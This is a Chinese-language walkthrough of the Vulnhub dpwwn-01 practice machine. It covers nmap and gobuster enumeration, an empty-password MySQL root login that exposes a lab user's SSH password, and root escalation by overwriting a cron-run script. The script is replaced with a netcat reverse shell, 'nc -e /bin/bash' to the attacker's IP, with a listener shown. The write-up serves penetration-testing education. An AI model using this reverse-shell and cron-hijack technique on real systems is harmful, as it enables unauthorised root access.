dpwwn-01靶机笔记
概述
这是一台Vulnhub的靶机,主要在web方面,我们无法找到突破口时,应该怎样抉择mysql和ssh的爆破,以及弱口令的尝试。
我这里准备了连接,当然你也可去Vulnhub平台自己下载
dpwwn-01靶机:https://pan.baidu.com/s/1P5Peude95xYcsUsKd0_55w?pwd=8v4h
提取码:8v4h
一、nmap扫描
1、主机发现
# -sn只做ping扫描,不做端口扫描
sudo nmap -sn 192.168.84.1/24
看到靶机IP地址是192.168.84.129
MAC Address: 00:50:56:FA:CB:D3 (VMware)
Nmap scan report for 192.168.84.129
Host is up (0.00072s latency).
2、端口扫描
-sT 以TCP全连接扫描,--min-rate 10000 以最低10000速率进行扫描,-p-进行全端口扫描,-o ports结果输出到ports文件中
sudo nmap -sT --min-rate 10000 -p- 192.168.84.129 -o ports
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-10 03:43 EDT
Nmap scan report for 192.168.84.129
Host is up (0.00034s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 00:0C:29:33:4A:85 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 4.15 seconds
提取端口
cat 查看文件 grep过滤open字符串 awk 中-F指定分隔符,打印分隔后的第一列,paste -s指定多行拼接,-d指定拼接符
cat ports | grep open | awk -F '/' '{print $1}' | paste -sd ','
结果 22,80,139,445,3306,6667
复制给变了ports
ports=$(cat ports | grep open | awk -F '/' '{print $1}' | paste -sd ',')
3、详细信息扫描
以-sT 以tcp, -sV探测版本, -sC以默认脚本 扫描端口 $ports,-O探测操作系统版本,输出到details文件中
sudo nmap -sT -sV -sC -p$ports -O 192.168.84.129 -o details
# 在输入完$ports按tab键会自动补全端口
sudo nmap -sT -sV -sC -p22,80,3306 -O 192.168.84.129 -o details
结果:
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-10 03:46 EDT
Nmap scan report for 192.168.84.129
Host is up (0.00026s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 c1d3be39429d5cb4952c5b2e20590e3a (RSA)
| 256 434ac610e7177da0c0c376881d43a18c (ECDSA)
|_ 256 0ecce3e1f78773a10347b9e2cf1c9315 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Apache HTTP Server Test Page powered by CentOS
| http-methods:
|_ Potentially risky methods: TRACE
3306/tcp open mysql MySQL 5.5.60-MariaDB
| mysql-info:
| Protocol: 10
| Version: 5.5.60-MariaDB
| Thread ID: 6
| Capabilities flags: 63487
| Some Capabilities: Speaks41ProtocolNew, SupportsCompression, ODBCClient, SupportsTransactions, IgnoreSpaceBeforeParenthesis, LongColumnFlag, Speaks41ProtocolOld, FoundRows, ConnectWithDatabase, IgnoreSigpipes, Support41Auth, SupportsLoadDataLocal, InteractiveClient, DontAllowDatabaseTableColumn, LongPassword, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: pT5IR={v`[(QD?NJgK~Y
|_ Auth Plugin Name: mysql_native_password
MAC Address: 00:0C:29:33:4A:85 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.45 seconds
看到目标服务开启了ssh,http,mysql服务的详细信息,服务比较少。
4、默认脚本扫描
nmap --script=vuln -p22,80,3306 192.168.84.129 -o vuln
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-10 03:48 EDT
Nmap scan report for 192.168.84.129
Host is up (0.00031s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /info.php: Possible information file
|_ /icons/: Potentially interesting folder w/ directory listing
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 147.72 seconds
根据优先级,我们应该是先对web做渗透测试,然后依次是,mysql,ssh等
二、web渗透
我们现访问一下80端口
这是一个apache服务的默认页面,我们只能尝试目录爆破了。
gobuster dir -u http://192.168.84.129 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.84.129
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
没有发现目录,我们加上指定后缀在爆破试一试
sudo gobuster dir -u http://192.168.84.129 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,zip,tar,conf
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.84.129
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,zip,tar,conf
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/info.php (Status: 200) [Size: 47462]
Progress: 1323360 / 1323366 (100.00%)
===============================================================
Finished
===============================================================
只有一个info.php
依然没有有用的信息
我们在目录爆破没有收获的时候,现在要怎么抉择,因为我们并没有针对性的用户名和密码字典,ssh和mysql服务都需要爆破。这时我们应该先选择爆破mysql,因为我们虽然知道爆破ssh,一旦爆破进去就会获得立足点,但是我们并不知道可能存在的用户名和密码,这将耗费我们大部分的时间去做没有收获的事情。而mysql服务有默认的root用户,我们只需要用小部分时间尝试一下弱口令,以及爆破。
综上,我们应该优先去尝试以mysql作为突破口
3、获得立足点
尝试mysql的root弱口令
mysql -uroot -h 192.168.84.129
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 1535
Server version: 5.5.60-MariaDB MariaDB Server
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
可以看到,我们直接空密码就进来了
翻找用户信息 show databases;
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| ssh |
+--------------------+
4 rows in set (0.010 sec)
看到ssh数据库,查看一下
有users ,查看一下
MariaDB [ssh]> select * from users;
+----+----------+---------------------+
| id | username | password |
+----+----------+---------------------+
| 1 | mistic | testP@$$swordmistic |
+----+----------+---------------------+
1 row in set (0.000 sec)
看到了一组凭据。我们保存下来
echo "mistic:testP@\$\$swordmistic" > creds
ssh连接
sudo ssh [email protected]
成功获得立足点
四、提权到root
在mistic用户目录下看到logrot.sh脚本
查看一下脚本
[mistic@dpwwn-01 ~]$ cat logrot.sh
#!/bin/bash
#
#LOGFILE="/var/tmp"
#SEMAPHORE="/var/tmp.semaphore"
while : ; do
read line
while [[ -f $SEMAPHORE ]]; do
sleep 1s
done
printf "%s\n" "$line" >> $LOGFILE
done
既然有这个脚本,我们先想到查看一下定时任务,是不是在运行这个脚本。
[mistic@dpwwn-01 ~]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
*/3 * * * * root /home/mistic/logrot.sh
的确有这个定时任务,可以直接修改logrot.sh脚本来进行提权
echo "nc -e /bin/bash 192.168.84.128 4444" > logrot.sh
本地监听4444端口
nc -lvp 4444
提权成功
拿flag
我知道这是一个很简单的挑战,祝贺
总结
- 我们通过nmap扫描发现目标开启了ssh,http,mysql服务。
- 先对web站点进行了目录爆破,可惜一无所获。
- 然后就陷入了实现爆破ssh,还是mysql的窘境,因为我们并没有有力的信息,去构造有价值与针对性的字典。
- 因为mysql有默认的用户名root,我们选择对它尝试弱口令,成功登陆mysql,发现ssh凭据。
- 利用ssh凭据,成功获得立足点,在mistic用户目录下发现
logrot.sh定时任务脚本。 - 利用定时人物脚本,反弹root权限的shell。成功拿下这台机器。